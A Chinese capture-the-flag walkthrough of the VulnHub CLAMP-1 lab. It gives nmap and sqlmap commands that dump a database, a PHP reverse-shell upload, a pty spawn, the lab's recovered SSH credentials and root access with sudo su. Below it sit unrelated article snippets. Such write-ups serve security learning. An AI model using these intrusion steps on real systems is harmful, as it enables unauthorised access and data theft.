当前位置：首页 > news >正文

CLAMP-1靶机渗透测试

news 2026/2/10 12:18:42

一、靶机下载地址

https://www.vulnhub.com/entry/clamp-101,320/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:88:B4:BF"

2、端口扫描

# 使用命令
nmap 192.168.145.0/24 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.206

4、目录扫描

# 使用命令
dirb http://192.168.145.206

三、获取shell

1、访问靶机IP地址

2、拼接并访问 `/nt4stopc/`，发现下面有一些问题，提示必须收集答案

3、都是一些判断题，对与错对应1与0，最后结果为`0110111001`，拼接访问

4、点击图中位置，发现存在参数，php语言，尝试注入，and 1=1 --+ 显示正常，and 1=2--+ 显示异常,表名存在SQL注入

5、使用sqlmap工具进行检测

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch

6、获取库名

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

7、获取tatil库下的表名

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil --tables

8、获取gereksiz字段下的数据


# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil -T gereksiz --columns --dump

9、解码后如下结果，可能还是路径，拼接访问

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

10、再拼接 `upload.php`，发现文件上传的功能

11、但是没有提交按钮，自己在前端给加一个

12、kali 生成反弹 shell

# 使用命令
locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .nano php-reverse-shell.php

13、上传该文件后，返回了文件路径，文件名为md5加密后的

14、拼接访问文件，成功反弹shell

四、提权

1、使用 python 提升交互性

# 使用命令
python3 -c 'import pty;pty.spawn("/bin/bash")'

2、在 `/var/www/html` 下发现 `important.pcapng`文件

3、查看文件，发现内容

4、url解码，得到以下数据，账号密码为`mkelepce:mklpc-osas112.`

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

5、使用ssh连接，连接成功

# 使用命令
ssh mkelepce@192.168.145.206

6、查看当前权限

# 使用命令
sudo -l
mklpc-osas112.

7、执行`sudo su`命令提权成功

CLAMP-1靶机渗透测试

一、靶机下载地址 https://www.vulnhub.com/entry/clamp-101,320/ 二、信息收集 1、主机发现 # 使用命令 nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:88:B4:BF" 2、端口扫描 # 使用命令 nmap 192.168.145.0/24 -p- -sV 3、指纹识别 # 使用命令 whatweb …...

编程日记 2024/8/12 13:41:59

JavaScript中的Truthy Falsy值以及等号判断

1.Falsy & Truthy Falsy的值false，0，-0， “”， null， undefined，NaNTruthy的值除了以上之外的其他值 2.等号判断 console.log(10 10); console.log(0 ); console.log(0 false); console.log( fa…...

编程日记 2024/8/12 13:40:57

uniapp——展开和收起

案例展示代码后台返回的数据格式如下： {1: "大富科技速度快放假手动阀",2: "第三方斯蒂芬斯蒂芬是的开发时间",4: "45345345",5: "电饭锅电饭锅地方" }<view class"tipTitle">温馨提示</view> &l…...

编程日记 2024/8/12 13:39:55

WebGL2学习(2): GLSL ES 3.0

更多精彩内容尽在 dt.sim3d.cn ，关注公众号【sky的数孪技术】，技术交流、源码下载请添加VX：digital_twin123 WebGL 2.0 给 GLSL 带来了重大变化。WebGL 1.0 中使用的 GLSL 版本是 GLSL ES 1.0。 WebGL 2.0 中仍然可用。但是，通过编…...

编程日记 2024/8/12 13:36:52

[大模型实战] DAMODEL云算力平台部署LLama3.1大语言模型

[大模型实战] DAMODEL云算力平台部署LLama3.1大语言模型目录一、LLama3.1二、DAMODEL云算力平台2.1 提供的服务2.1.1 AI训练2.1.2 AI推理2.1.3 高性能计算2.1.4 图像／视频渲染2.1.5 定制化部署 2.2 支持的GPU 三、在DAMODEL部署LLama3.13.1 在DAMODEL创建实例&…...

编程日记 2024/8/12 13:32:43

驱动开发系列09 - Linux设备模型之设备，驱动和总线

一：概述 Linux 设备模型（LDM）是 Linux 内核中引入的一个概念。用于管理内核对象（那些需要引用计数的对象、例如文件、设备、总线甚至驱动程序），以及描述它们之间的层次结构，以及这些内核对象之间绑定关系。Linux 设备模型引入了对象生命周期管理、引用计数、以及面向对象…...

编程日记 2024/8/12 13:30:40

HTML实现弹出层

leopard/ˈlepərd/ 豹子，豹纹弹出层指的是鼠标悬停于某个元素之上时显示的一个界面组件。关注和理解特性：z-index属性和动态生成HTML元素。 HTML5新增： figure:媒体内容(图像，音频，视频)，用于包含一…...

编程日记 2024/8/12 13:28:38

Android控件详解

在Android应用程序中，界面由布局和组件组成。布局相当于框架，而控件则是框架里面的内容。了解过Android布局后，如果要设计ui界面，还需要了解和掌握各个控件的应用。一个界面的设计，先从创建容器开始，再向…...

编程日记 2024/8/12 13:25:34

记忆化搜索专题篇

目录斐波那契数不同路径最长递增子序列猜数字大小II 矩阵中的最长递增路径声明：下面将主要使用递归记忆化搜索来解决问题！！！ 斐波那契数题目思路斐波那契数的特点就是除了第一个数是0，第二个数是1&…...

编程日记 2024/8/12 13:24:32

入网测评检查项大全（安全资料）

1. Linux操作系统 2. Windows操作系统 3. Tomcat中间件 4. Nginx中间件 5. Mysql数据库 6. Weblogic中间件 7. Oracle数据库 8. Redis数据库 9. 达梦数据库 10. 应用系统 11. 渗透测试 13 .AIX操作系统 14 .中创中间件 15 .IIS中间件 16 .Apache中间件 17 .Mari…...

编程日记 2024/8/12 13:22:30

uni-app 开发App时调用uni-push 实现在线系统消息推送通知保姆教程

一、引言在开发App时避免不了需要推送系统通知，以提高用户的使用体验。在自己的一个工具型的小app上全流程接入了uni-push2.0的推送能力，做个记录，以防后期需要用到。在阅读本教程前最好先看看官方文档，结合官方文档使用&#xf…...

编程日记 2024/8/12 13:21:29

13.StringRedisTemplete使用

上一篇说到改变了RedisTemplate的默认序列化器后，在redis中存入Java对象后，在redis中的呈现是：会记录类的字节码这也是代码中可以强制装换为对应的java对象的原因： Test void testStudent() {redisTemplate.opsForValue().set(&q…...

编程日记 2024/8/12 13:19:28

[工具]-gitee+pycharm-配置

安装git 查看git是否安装设置成功： git config user.name git config user.email 码云账号设置邮箱 pycharm设置gitee 打开 PyCharm，在 Settings - Plugins 里面，搜索 Gitee 插件，安装后重启 PyCharm。 pychar…...

编程日记 2024/8/12 13:18:26

中间件是一种在客户端和服务器之间进行通信和处理的软件组件或服务

中间件是一种在客户端和服务器之间进行通信和处理的软件组件或服务。中间件位于应用程序和操作系统之间，可以提供一些功能，如请求转发、数据转换、安全性和身份验证、日志记录等。中间件的主要作用是将应用程序与底层基础设施解耦，提供了一…...

编程日记 2024/8/12 13:16:25

RCE-eval长度限制突破技巧

目录一、长度17的限制绕过 1、最简单的绕过 （一）绕过 （二）编写一句话木马 2、文件包含的利用 （一）远程文件包含的利用 （二）本地文件包含的利用 3、usort绕过 &#xff08…...

编程日记 2024/8/12 13:08:16

【黑马】MyBatis

目录 MyBatis简介JDBC缺点：MyBatis针对于JDBC进行简化，简化思路： MyBatis快速入门具体构建步骤解决SQL映射文件的警告提示 Mapper代理开发案例：使用Mapper代理方式完成案例具体步骤详解：Mapper代理方式 Mapper核心配置…...

编程日记 2024/8/12 13:03:10

oracle创建dblink使得数据库A能够访问数据库B表LMEAS_MFG_FM的数据

1、给数据库A普通用户CMRONLINE相应的权限，在sys用户下执行以下语句 GRANT CREATE DATABASE LINK TO CMRONLINE; GRANT DROP PUBLIC DATABASE LINK TO CMRONLINE; GRANT CREATE PUBLIC DATABASE LINK TO CMRONLINE; 2、在数据库A用户 CMRONLINE下执行创建语句&…...

编程日记 2024/8/12 13:02:09

git config 如何配置用户账户

Git配置用户账户主要涉及设置用户名和邮箱地址，这是Git进行版本控制时用于标识提交者身份的重要信息。以下是如何配置Git用户账户的详细步骤： 1. 打开命令行工具首先，需要打开命令行工具（如CMD、Terminal或Git Bash等&#xff…...

编程日记 2024/8/12 13:01:08

SpringBoot基础(二)：配置文件详解

SpringBoot基础系列文章 SpringBoot基础(一)：快速入门 SpringBoot基础(二)：配置文件详解目录一、配置文件分类二、配置文件优先级1、不同版本优先级2、不同位置优先级三、配置文件格式1、yml和yaml格式1.1、字符串1.2、布尔类型1.3、整数型1.4、浮点…...

编程日记 2024/8/12 12:57:04

Web安全(一)-靶场搭建过程-基于docker

今天来复习一下web方面的知识 1.1 sqliab环境搭建基于Centos 和Docker 1.1.1 Vmware环境安装这个就略去了吧博主使用的是vmware17pro 具体的密钥什么的大家懂的都懂这里就不提供了接下来将带大家安装centos7的镜像为了方便操作这里选择 centos7_minimal 地址如下:…...

编程日记 2024/8/12 12:55:02

论文解读：交大港大上海AI Lab开源论文 | 宇树机器人多姿态起立控制强化学习框架（二）

HoST框架核心实现方法详解 - 论文深度解读（第二部分）《Learning Humanoid Standing-up Control across Diverse Postures》系列文章：论文深度解读 + 算法与代码分析（二）作者机构：上海AI Lab, 上海交通大学, 香港大学, 浙江大学, 香港中文大学论文主题：人形机器人…...

编程新知 2026/2/9 0:12:12

Java 8 Stream API 入门到实践详解

一、告别 for 循环！ 传统痛点： Java 8 之前，集合操作离不开冗长的 for 循环和匿名类。例如，过滤列表中的偶数： List<Integer> list Arrays.asList(1, 2, 3, 4, 5); List<Integer> evens new ArrayList…...

编程新知 2026/1/12 10:41:22

python/java环境配置

环境变量放一起 python： 1.首先下载Python Python下载地址：Download Python | Python.org downloads ---windows -- 64 2.安装Python 下面两个，然后自定义，全选可以把前4个选上 3.环境配置 1）搜高级系统设置 2…...

编程新知 2026/2/9 15:41:39

安宝特方案丨XRSOP人员作业标准化管理平台：AR智慧点检验收套件

在选煤厂、化工厂、钢铁厂等过程生产型企业，其生产设备的运行效率和非计划停机对工业制造效益有较大影响。随着企业自动化和智能化建设的推进，需提前预防假检、错检、漏检，推动智慧生产运维系统数据的流动和现场赋能应用。同时，…...

编程新知 2026/2/5 17:57:20

电脑插入多块移动硬盘后经常出现卡顿和蓝屏

当电脑在插入多块移动硬盘后频繁出现卡顿和蓝屏问题时，可能涉及硬件资源冲突、驱动兼容性、供电不足或系统设置等多方面原因。以下是逐步排查和解决方案： 1. 检查电源供电问题问题原因：多块移动硬盘同时运行可能导致USB接口供电不足&#x…...

编程新知 2025/10/28 15:02:57

【CSS position 属性】static、relative、fixed、absolute 、sticky详细介绍，多层嵌套定位示例

文章目录 ★ position 的五种类型及基本用法 ★ 一、position 属性概述二、position 的五种类型详解（初学者版） 1. static（默认值） 2. relative（相对定位） 3. absolute（绝对定位） 4. fixed（固定定位） 5. sticky（粘性定位）三、定位元素的层级关系（z-i…...

编程新知 2026/2/9 1:38:05

基于Docker Compose部署Java微服务项目

一. 创建根项目根项目（父项目）主要用于依赖管理一些需要注意的点： 打包方式需要为 pom<modules>里需要注册子模块不要引入maven的打包插件，否则打包时会出问题 <?xml version"1.0" encoding"UTF-8…...

编程新知 2026/2/5 3:09:56

【HarmonyOS 5 开发速记】如何获取用户信息（头像/昵称/手机号）

1.获取 authorizationCode： 2.利用 authorizationCode 获取 accessToken：文档中心 3.获取手机：文档中心 4.获取昵称头像：文档中心首先创建 request 若要获取手机号，scope必填 phone，permissions 必填 …...

编程新知 2025/9/17 2:39:21

10-Oracle 23 ai Vector Search 概述和参数

一、Oracle AI Vector Search 概述企业和个人都在尝试各种AI，使用客户端或是内部自己搭建集成大模型的终端，加速与大型语言模型（LLM）的结合，同时使用检索增强生成（Retrieval Augmented Generation &#…...

编程新知 2026/2/9 20:30:28

【C++特殊工具与技术】优化内存分配(一)：C++中的内存分配

目录一、C 内存的基本概念 1.1 内存的物理与逻辑结构 1.2 C 程序的内存区域划分二、栈内存分配 2.1 栈内存的特点 2.2 栈内存分配示例三、堆内存分配 3.1 new和delete操作符 4.2 内存泄漏与悬空指针问题 4.3 new和delete的重载四、智能指针…...

编程新知 2026/1/31 6:12:22